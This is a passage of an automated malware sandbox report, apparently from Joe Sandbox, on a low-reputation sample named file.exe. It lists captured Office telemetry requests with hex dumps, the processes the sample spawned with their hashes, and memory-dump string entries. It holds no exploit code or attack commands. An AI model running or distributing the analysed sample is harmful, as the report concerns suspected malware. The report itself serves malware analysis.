                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:26 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                  x-ms-request-id: 3038b393-701e-0053-5e79-3d3a0a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185326Z-174c587ffdf6b487hC1TEBydsn00000003b0000000002wg6
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:26 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  145192.168.2.74994913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:25 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:26 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1378
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE584C214"
                                                                                                                                                                                  x-ms-request-id: 36815d12-601e-0070-4763-3ba0c9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185326Z-178bfbc474bw8bwphC1NYC38b400000004s00000000058ts
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:26 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  146192.168.2.74994613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:25 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:26 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1405
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                  x-ms-request-id: 6d8f64b9-901e-005b-763b-3c2005000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185326Z-178bfbc474bpscmfhC1NYCfc2c00000003bg00000000m9vt
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:26 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  147192.168.2.74995113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:26 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:26 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1407
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                  x-ms-request-id: 23fc118c-601e-0084-474e-3c6b3f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185326Z-15b8b599d88pxmdghC1TEBux9c00000003k00000000015ec
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:26 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  148192.168.2.74995613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:28 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:28 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1370
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                  x-ms-request-id: 24867866-a01e-0053-1264-3b8603000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185328Z-178bfbc474b9fdhphC1NYCac0n00000004qg00000000hhxa
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:28 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  149192.168.2.74995913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:28 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:28 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1406
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                  x-ms-request-id: e8ec328a-c01e-0049-1675-3cac27000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185328Z-174c587ffdfcb7qhhC1TEB3x7000000003ag00000000kktv
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:28 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                  Start time:13:52:11
                                                                                                                                                                                  Start date:23/11/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                  Imagebase:0x5e0000
                                                                                                                                                                                  File size:1'840'128 bytes
                                                                                                                                                                                  MD5 hash:ACC594995958C5CF5F107FE27DB38F8E
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                  Start time:15:31:17
                                                                                                                                                                                  Start date:23/11/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                  Imagebase:0x7ff6c4390000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                  Start time:15:31:18
                                                                                                                                                                                  Start date:23/11/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=1908,i,3407012707208329137,12783355728101438977,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff6c4390000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                  Start time:15:31:21
                                                                                                                                                                                  Start date:23/11/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                  Imagebase:0x7ff6c4390000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                  Start time:15:31:21
                                                                                                                                                                                  Start date:23/11/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1932,i,12659663742680586460,29782516825973807,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                  Imagebase:0x7ff6c4390000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Reset < >
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000003.00000003.1433206935.000000000530F000.00000004.00000800.00020000.00000000.sdmp, Offset: 05308000, based on PE: false
                                                                                                                                                                                    • Associated: 00000003.00000003.1728015616.0000000005304000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_5308000_file.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: h$h
                                                                                                                                                                                    • API String ID: 0-184830790
                                                                                                                                                                                    • Opcode ID: 5324a58d7f78c6b01d2b20814b9946ae778cb76300413d65cc1298f4a8e25373
                                                                                                                                                                                    • Instruction ID: f849c284c6211c69b08ff3b5a4885bede9b78594d110fd452bcb61d37ba3fa10
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5324a58d7f78c6b01d2b20814b9946ae778cb76300413d65cc1298f4a8e25373
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D21442285E3C04FD347DB749D7A6867F71AF43214B1A84DBC8C1CB0A3D6590849CB22
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000003.00000003.1433206935.000000000530F000.00000004.00000800.00020000.00000000.sdmp, Offset: 05308000, based on PE: false
                                                                                                                                                                                    • Associated: 00000003.00000003.1728015616.0000000005304000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_5308000_file.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: h
                                                                                                                                                                                    • API String ID: 0-2439710439
                                                                                                                                                                                    • Opcode ID: 803639f93913149c51f95a1d6a4749f9814ab8d10e80442844761a56bb4cba80
                                                                                                                                                                                    • Instruction ID: 2f358cb67d5edfc412ac87e497c5d52a80a78102e935ab12e6a306bbfd445f40
                                                                                                                                                                                    • Opcode Fuzzy Hash: 803639f93913149c51f95a1d6a4749f9814ab8d10e80442844761a56bb4cba80
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C71006244E3C14FD7438BB098756867FB1AF53220B1E84DBC5C1CF1A3E66C188ADB66
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000003.00000003.1433206935.000000000530F000.00000004.00000800.00020000.00000000.sdmp, Offset: 05308000, based on PE: false
                                                                                                                                                                                    • Associated: 00000003.00000003.1728015616.0000000005304000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_5308000_file.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: h
                                                                                                                                                                                    • API String ID: 0-2439710439
                                                                                                                                                                                    • Opcode ID: 1815ddf8f708d567a0089a0bc89e1e8bc13d32ad8840803eab4e34d69afa62a0
                                                                                                                                                                                    • Instruction ID: d1a0590d9b261601485f14867149d4f2bd6b17f60c30b891491558b54d041602
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1815ddf8f708d567a0089a0bc89e1e8bc13d32ad8840803eab4e34d69afa62a0
                                                                                                                                                                                    • Instruction Fuzzy Hash: C621796245E3C19FD317DB749C6568ABFB2AF03210B1A84DFC5C0CF4A3E2690849CB22
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000003.00000003.1433206935.000000000530F000.00000004.00000800.00020000.00000000.sdmp, Offset: 0530F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_5308000_file.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: h
                                                                                                                                                                                    • API String ID: 0-2439710439
                                                                                                                                                                                    • Opcode ID: 1815ddf8f708d567a0089a0bc89e1e8bc13d32ad8840803eab4e34d69afa62a0
                                                                                                                                                                                    • Instruction ID: d1a0590d9b261601485f14867149d4f2bd6b17f60c30b891491558b54d041602
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1815ddf8f708d567a0089a0bc89e1e8bc13d32ad8840803eab4e34d69afa62a0
                                                                                                                                                                                    • Instruction Fuzzy Hash: C621796245E3C19FD317DB749C6568ABFB2AF03210B1A84DFC5C0CF4A3E2690849CB22
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000003.00000003.1433206935.000000000530F000.00000004.00000800.00020000.00000000.sdmp, Offset: 0530A000, based on PE: false
                                                                                                                                                                                    • Associated: 00000003.00000003.1464420028.000000000530A000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_5308000_file.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: h
                                                                                                                                                                                    • API String ID: 0-2439710439
                                                                                                                                                                                    • Opcode ID: 46e8325331227e59899386a509006c364a9a524683e1d7f0f80b091424debd46
                                                                                                                                                                                    • Instruction ID: d1a0590d9b261601485f14867149d4f2bd6b17f60c30b891491558b54d041602
                                                                                                                                                                                    • Opcode Fuzzy Hash: 46e8325331227e59899386a509006c364a9a524683e1d7f0f80b091424debd46
                                                                                                                                                                                    • Instruction Fuzzy Hash: C621796245E3C19FD317DB749C6568ABFB2AF03210B1A84DFC5C0CF4A3E2690849CB22
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000003.00000003.1433206935.000000000530F000.00000004.00000800.00020000.00000000.sdmp, Offset: 05301000, based on PE: false
                                                                                                                                                                                    • Associated: 00000003.00000003.1484744056.0000000005301000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_5308000_file.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: h
                                                                                                                                                                                    • API String ID: 0-2439710439
